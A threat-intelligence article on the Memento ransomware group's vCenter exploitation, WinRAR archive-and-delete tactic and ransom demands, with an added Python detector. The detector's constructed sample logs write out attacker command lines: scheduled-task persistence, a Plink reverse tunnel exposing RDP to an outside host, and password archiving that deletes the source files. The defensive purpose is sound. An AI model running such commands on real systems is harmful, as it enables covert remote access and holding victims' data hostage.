Researchers have observed a new ransomware group, dubbed Memento Team, taking a different approach to locking files after its earlier attacks failed. Instead of encrypting the files, the group uses a customized freeware version of WinRAR to archive them and then deletes the originals.

What was detected?

Researchers from Sophos identified that the Memento Team has been active since last month and is attempting to target VMware vCenter Server.
  • To carry out these attacks, they used a wide range of tools and tricks, each with a specific use at a particular stage of the attack.
  • The attackers targeted a flaw in the VMware vCenter Server web client to obtain initial access to target networks.
  • The vulnerability, tracked as CVE-2021-21972, is a remote code execution flaw that allows attackers to reach the exposed vCenter server over TCP port 443 and execute commands.
  • After the attack, the hackers dropped a ransom note demanding that victims pay 0.099 BTC ($5,850) to decrypt each file or, alternatively, 15.95 BTC ($940,000) to recover all files.

Persistence and reconnaissance

  • They established persistence on the target network through scheduled tasks (named Windows Defender Metadata Monitor).
  • They then used RDP over SSH via Plink to move laterally within the network.

Post-reconnaissance

  • After reconnaissance, the attackers used WinRAR to archive the files.
  • They protected the archives with a strong password and deleted the original files.
  • The keys were further protected via encryption.
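As an added illustration (not from the Sophos report or this article), the following Python detector runs over constructed Sysmon-style process-creation records and flags the three behaviours described above: a scheduled task with the reported name, a Plink port forward toward RDP, and a rar/WinRAR run that both sets a password and deletes its source files. The log format and command lines are constructed; the WinRAR switches -p/-hp (password) and -df (delete files after archiving) are documented switches and are an assumption about how such tooling would be invoked.

```python
import re

# Constructed Sysmon-style process-creation records written for this example; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /tn "Windows Defender Metadata Monitor" /tr C:\Users\Public\svc.exe /sc onstart /ru SYSTEM'},
    {"image": r"C:\Users\Public\plink.exe",
     "cmdline": "plink.exe -ssh -P 443 -l user -pw pass -R 3389:127.0.0.1:3389 203.0.113.10"},
    {"image": r"C:\Users\Public\rar.exe",
     "cmdline": r"rar.exe a -r -hpSecretPass -df D:\out\finance.rar D:\Shares\Finance"},
    {"image": r"C:\Program Files\WinRAR\WinRAR.exe",   # benign backup: no password, no delete
     "cmdline": r'WinRAR.exe a -r "C:\Backups\photos.rar" C:\Users\alice\Pictures'},
]

# Task name quoted in the Sophos report (compared case-insensitively).
TASK_NAME = "windows defender metadata monitor"
# Documented WinRAR switches (assumption that an operator uses the CLI this way):
# -p<pwd>/-hp<pwd> set a password (hp also encrypts headers); -df deletes sources after archiving.
RE_PASSWORD = re.compile(r"\s-(?:hp|p)\S*", re.I)
RE_DELETE = re.compile(r"\s-d[fr]\b", re.I)
RE_TASK_NAME = re.compile(r'/tn\s+(?:"([^"]*)"|(\S+))', re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the names of the detection rules that fire for one process-creation record."""
    exe, cmd = basename(event["image"]), event["cmdline"]
    hits = []
    if exe == "schtasks.exe" and re.search(r"/create\b", cmd, re.I):
        m = RE_TASK_NAME.search(cmd)
        if m and (m.group(1) or m.group(2)).strip().lower() == TASK_NAME:
            hits.append("scheduled_task_persistence")
    # Plink -R/-L forward that carries the RDP port (3389) over SSH.
    if exe == "plink.exe" and re.search(r"\s-[RL]\s+\S*3389", cmd):
        hits.append("plink_rdp_tunnel")
    # rar/WinRAR "a" (add) command combining a password with delete-after-archive.
    if exe in ("rar.exe", "winrar.exe") and re.search(r"^\S+\s+a\b", cmd):
        if RE_PASSWORD.search(cmd) and RE_DELETE.search(cmd):
            hits.append("rar_archive_and_delete")
    return hits


def detect(events):
    """(event index, rule name) pairs for every record that matches a rule."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]
```

A password-protected archive by itself is common in legitimate use; the combination with -df on file-server paths, alongside the task and tunnel signals, is what separates this activity from a routine backup.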

Memento’s earlier failed attempt

Researchers identified that Memento had been attempting to exploit the vCenter vulnerability since April.
  • The attackers had used BCWipe, the data-wiping utility from Jetico, to delete any traces of data. They then used a Python-based ransomware strain for AES-based encryption.
  • However, that attempt was not successful: the systems were protected by an anti-ransomware solution, which detected and blocked the encryption step before it caused any damage.

Ending notes

Memento operators are using uncommon methods to target their victims, although victims were able to fend off these attacks by using anti-ransomware solutions. Moreover, some victims were able to limit the damage of ransomware attacks by using data backups. This highlights the importance of such protective measures in the fight against ransomware.
Cyware Publisher